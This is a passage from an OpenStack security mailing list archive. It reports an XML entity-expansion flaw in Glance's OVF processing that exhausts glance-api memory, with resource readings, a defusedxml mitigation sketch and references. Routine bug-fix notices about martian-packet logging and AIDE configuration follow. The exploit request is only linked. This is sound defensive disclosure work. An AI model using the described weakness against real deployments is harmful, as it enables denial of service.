Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      83.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         1426876 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      79.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         1181248 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      85.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         817244 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      84.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         548636 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

Object                                 Metric                       Values
----------                             --------------------         --------------------------------------------
devstack_devstack_1473967678756_60616  Guest/CPU/Load/User:avg      74.00%
devstack_devstack_1473967678756_60616  Guest/RAM/Usage/Free         118932 kB
devstack_devstack_1473967678756_60616  Guest/Pagefile/Usage/Total   0 kB

After submitting enough of these requests at once, glance-api runs out of
memory and can't restart itself.
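The mitigation repeated below is to swap xml.etree for a hardened parser such
as defusedxml. As a rough illustration of that swap (not the actual Glance
patch: the parse_ovf helper and its logging are invented for the example, and
the real ovf_process code uses iterparse rather than parse), a defused parse
refuses to expand entity declarations and raises instead:

# Minimal sketch: parsing an extracted OVF descriptor with defusedxml
# instead of xml.etree. Names and code paths are illustrative only.
import logging

import defusedxml.ElementTree as ET
from defusedxml import DTDForbidden, EntitiesForbidden

LOG = logging.getLogger(__name__)

def parse_ovf(ovf_path):
    # defusedxml forbids entity declarations by default, so a "billion
    # laughs" DOCTYPE raises EntitiesForbidden instead of expanding into
    # gigabytes of memory inside glance-api.
    try:
        return ET.parse(ovf_path)
    except (DTDForbidden, EntitiesForbidden) as exc:
        LOG.warning("Rejecting OVF with forbidden XML constructs: %s", exc)
        raise ValueError("OVF descriptor failed XML safety checks")

With a guard like this, a malicious image would simply fail the import task
rather than exhausting the node's memory.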
Here's what the log looks like after the "killer request" [4]

-----------------------------------------
Mitigation
-----------------------------------------

Any instances of xml.etree should be replaced with their equivalent in a
secure XML parsing library like defusedxml [5]

1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml

-----------------------------------------
Other
-----------------------------------------

Thanks to Rahul Nair from the OpenStack Security Project for bringing the
ovf_process file to my attention in the first place. We are testing Glance
for security defects as part of OSIC, using our API security testing tool
called Syntribos (https://github.com/openstack/syntribos), and Bandit
(which was used to discover this issue).

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions

From 1619039 at bugs.launchpad.net  Fri Sep 30 18:40:47 2016
From: 1619039 at bugs.launchpad.net (OpenStack Infra)
Date: Fri, 30 Sep 2016 18:40:47 -0000
Subject: [Openstack-security] [Bug 1619039] Fix included in openstack/openstack-ansible-security 12.2.4
References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com>
Message-ID: <20160930184047.27730.11967.malone@chaenomeles.canonical.com>

This issue was fixed in the openstack/openstack-ansible-security 12.2.4
release.

--
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1619039

Title:
  Logging of martian packets should be configurable

Status in openstack-ansible:
  Fix Released

Bug description:
  The martian logging should be tunable. When neutron uses Linux bridging
  for networking, lots of martian packets will be logged. This logging
  isn't useful and can fill up a syslog server quickly.

To manage notifications about this bug go to:
https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions

From 1617343 at bugs.launchpad.net  Fri Sep 30 18:40:49 2016
From: 1617343 at bugs.launchpad.net (OpenStack Infra)
Date: Fri, 30 Sep 2016 18:40:49 -0000
Subject: [Openstack-security] [Bug 1617343] Fix included in openstack/openstack-ansible-security 12.2.4
References: <20160826141422.16089.54915.malonedeb@soybean.canonical.com>
Message-ID: <20160930184049.23882.42431.malone@gac.canonical.com>

This issue was fixed in the openstack/openstack-ansible-security 12.2.4
release.

--
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1617343

Title:
  AIDE should not look at changes in /run

Status in openstack-ansible:
  Fix Released

Bug description:
  AIDE shouldn't be wandering into /run since things there only live
  temporarily.

  ---------------------------------------------------
  Changed entries:
  ---------------------------------------------------

  d =.... mc.. .. .: /etc/apparmor.d/libvirt
  d =.... mc.. .. .: /etc/libvirt/qemu
  d =.... mc.. .. .: /root
  f >b... mc..C.. .: /root/.bash_history
  f >.... mc..C.. .: /root/.ssh/known_hosts
  f >b... mci.C.. .: /root/.viminfo
  f =.... mci.C.. : /run/motd.dynamic
  d >.... mc.. .. : /run/shm
  f =.... ....C.. : /run/shm/spice.29052
  d =.... mc.. .. : /run/systemd/sessions
  d =.... mc.. .. : /run/systemd/users
  f =.... mci.C.. : /run/systemd/users/0
  d >.... . .. : /run/udev/data
  d =.... mc.. .. : /run/user

To manage notifications about this bug go to:
https://bugs.launchpad.net/openstack-ansible/+bug/1617343/+subscriptions

From 1616281 at bugs.launchpad.net  Fri Sep 30 18:40:51 2016
From: 1616281 at bugs.launchpad.net (OpenStack Infra)
Date: Fri, 30 Sep 2016 18:40:51 -0000
Subject: [Openstack-security] [Bug 1616281] Fix included in openstack/openstack-ansible-security 12.2.4
References: <20160824023003.4754.11744.malonedeb@gac.canonical.com>
Message-ID: <20160930184051.23833.41051.malone@gac.canonical.com>

This issue was fixed in the openstack/openstack-ansible-security 12.2.4
release.

--
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1616281

Title:
  Can't initialize AIDE during subsequent playbook runs

Status in openstack-ansible:
  Fix Released

Bug description:
  AIDE isn't initialized by default because it can cause a lot of system
  load when it does its first check of a new system. If a deployer applies
  the security hardening role with ``initialize_aide`` set to False (the
  default), it won't be initialized. However, if they set it to True and
  re-run the playbook, AIDE is already configured and the handler to
  initialize AIDE won't execute.

To manage notifications about this bug go to:
https://bugs.launchpad.net/openstack-ansible/+bug/1616281/+subscriptions